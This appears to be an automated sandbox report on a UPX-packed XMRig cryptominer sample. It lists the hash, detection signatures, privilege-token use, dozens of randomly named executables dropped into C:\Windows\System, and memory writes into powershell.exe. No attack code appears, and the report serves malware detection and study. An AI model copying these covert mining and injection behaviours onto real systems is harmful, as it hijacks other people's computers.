Malware Analysis Report

2025-04-19 15:36

Sample ID 240522-z7b8kshc47
Target 3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe
SHA256 afd9395e08f27d38df026a6d5ddebf6f97b417f70882c48467b6bdd6f1def2d5
Tags
xmrig execution miner upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

afd9395e08f27d38df026a6d5ddebf6f97b417f70882c48467b6bdd6f1def2d5

Threat Level: Known bad

The file 3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe was found to be: Known bad.

Malicious Activity Summary

xmrig execution miner upx

Xmrig family

XMRig Miner payload

xmrig

XMRig Miner payload

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Executes dropped EXE

Loads dropped DLL

UPX packed file

Legitimate hosting services abused for malware hosting/C2

Drops file in Windows directory

Unsigned PE

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-22 21:21

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Xmrig family

xmrig

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-22 21:21

Reported

2024-05-22 21:23

Platform

win7-20240221-en

Max time kernel

150s

Max time network

142s

Command Line

"C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\AnfHbgG.exe N/A
N/A N/A C:\Windows\System\owsTsek.exe N/A
N/A N/A C:\Windows\System\eXogIyX.exe N/A
N/A N/A C:\Windows\System\zoUXHGE.exe N/A
N/A N/A C:\Windows\System\mCNwbnq.exe N/A
N/A N/A C:\Windows\System\fHAoOSG.exe N/A
N/A N/A C:\Windows\System\PsTqftB.exe N/A
N/A N/A C:\Windows\System\JgTbNdc.exe N/A
N/A N/A C:\Windows\System\GujXmeB.exe N/A
N/A N/A C:\Windows\System\LfHGfqB.exe N/A
N/A N/A C:\Windows\System\pCPQzdl.exe N/A
N/A N/A C:\Windows\System\EtFmAcE.exe N/A
N/A N/A C:\Windows\System\QoMimGa.exe N/A
N/A N/A C:\Windows\System\wxCpkpj.exe N/A
N/A N/A C:\Windows\System\GQckUAj.exe N/A
N/A N/A C:\Windows\System\FfrtHjS.exe N/A
N/A N/A C:\Windows\System\CeemIxU.exe N/A
N/A N/A C:\Windows\System\twBhife.exe N/A
N/A N/A C:\Windows\System\sXmCKGJ.exe N/A
N/A N/A C:\Windows\System\iDYIyrC.exe N/A
N/A N/A C:\Windows\System\MbcGyDC.exe N/A
N/A N/A C:\Windows\System\NdEjRIZ.exe N/A
N/A N/A C:\Windows\System\Ylydjqo.exe N/A
N/A N/A C:\Windows\System\yrmfvbe.exe N/A
N/A N/A C:\Windows\System\UjIBrcH.exe N/A
N/A N/A C:\Windows\System\BxqKKjn.exe N/A
N/A N/A C:\Windows\System\lkrNRcv.exe N/A
N/A N/A C:\Windows\System\HUagQUk.exe N/A
N/A N/A C:\Windows\System\sjWpTAq.exe N/A
N/A N/A C:\Windows\System\wPEjBHG.exe N/A
N/A N/A C:\Windows\System\FgPswQg.exe N/A
N/A N/A C:\Windows\System\yMEECiQ.exe N/A
N/A N/A C:\Windows\System\JGnUHnm.exe N/A
N/A N/A C:\Windows\System\xDaBvJd.exe N/A
N/A N/A C:\Windows\System\rRfBZuB.exe N/A
N/A N/A C:\Windows\System\bsujjfH.exe N/A
N/A N/A C:\Windows\System\eUPoQiD.exe N/A
N/A N/A C:\Windows\System\hDBPigV.exe N/A
N/A N/A C:\Windows\System\UzlVdGz.exe N/A
N/A N/A C:\Windows\System\yYftVVC.exe N/A
N/A N/A C:\Windows\System\gCrppZa.exe N/A
N/A N/A C:\Windows\System\kAGLSmM.exe N/A
N/A N/A C:\Windows\System\VHOFmHS.exe N/A
N/A N/A C:\Windows\System\JQbBOgN.exe N/A
N/A N/A C:\Windows\System\nfrOFFx.exe N/A
N/A N/A C:\Windows\System\YNMJoSy.exe N/A
N/A N/A C:\Windows\System\wGlbRCV.exe N/A
N/A N/A C:\Windows\System\ZbzMgRZ.exe N/A
N/A N/A C:\Windows\System\oDFNSCe.exe N/A
N/A N/A C:\Windows\System\FEZacsb.exe N/A
N/A N/A C:\Windows\System\uaIYgAf.exe N/A
N/A N/A C:\Windows\System\TccFLGT.exe N/A
N/A N/A C:\Windows\System\xBVryRT.exe N/A
N/A N/A C:\Windows\System\QYkQRzf.exe N/A
N/A N/A C:\Windows\System\CPTBmpC.exe N/A
N/A N/A C:\Windows\System\MaIEuII.exe N/A
N/A N/A C:\Windows\System\MLVjhsP.exe N/A
N/A N/A C:\Windows\System\xqNikhP.exe N/A
N/A N/A C:\Windows\System\YYDrhEA.exe N/A
N/A N/A C:\Windows\System\lFCHXtS.exe N/A
N/A N/A C:\Windows\System\jGExwlu.exe N/A
N/A N/A C:\Windows\System\xMjbKgJ.exe N/A
N/A N/A C:\Windows\System\rRgVELe.exe N/A
N/A N/A C:\Windows\System\LkgEadE.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\ubXYsgT.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\aPuifna.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\ACuTcQX.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\IKRjSOW.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZWpWMza.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\khWADjL.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\kdXvvjj.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\bUvsdDR.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\ivJJmLY.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\CLlrLkJ.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\fdptttz.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\KUxSELx.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\awGHBQI.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\zYkecqc.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\HtSFjjw.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\cmIarMk.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\BVCLHEI.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\dwQtIzX.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\cRdmzEY.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\MFmgCFi.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\QtbRKUH.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\bmqcJVX.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\pQIMSRM.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\MSxRNJU.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\tKScPQZ.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\KnkXpvl.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\dcHNTre.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\LXYhWax.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\WwYEPOc.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\OrdUPGt.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\IdeIueD.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\IBlgrfC.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\XdTtohU.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\FLghzAN.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\uopUInQ.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\MHWeGzA.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\YnaGGfJ.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\JrMUgOg.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\fBUkvsl.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\IAPZBVu.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\gBahicG.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\vBezEXa.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\hWxhdFk.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\qSHyBsi.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\wYsDaUc.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\BLPMcDZ.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\tCTRizH.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\UTSHvAw.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\wbqFbAt.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\YBRKBgX.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\pzumFOv.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\hyDUzis.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\GqVWNXf.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\TveSKXB.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\hsXLnpu.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\JGztjpi.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\lRLeSzP.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\dXBAqmi.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\FhgMead.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\pzXdKZx.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\pyQsfJJ.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\VkFsesG.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\AhjvFcs.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\szZHVAy.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2040 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2040 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2040 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2040 wrote to memory of 2384 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\AnfHbgG.exe
PID 2040 wrote to memory of 2384 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\AnfHbgG.exe
PID 2040 wrote to memory of 2384 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\AnfHbgG.exe
PID 2040 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\owsTsek.exe
PID 2040 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\owsTsek.exe
PID 2040 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\owsTsek.exe
PID 2040 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\eXogIyX.exe
PID 2040 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\eXogIyX.exe
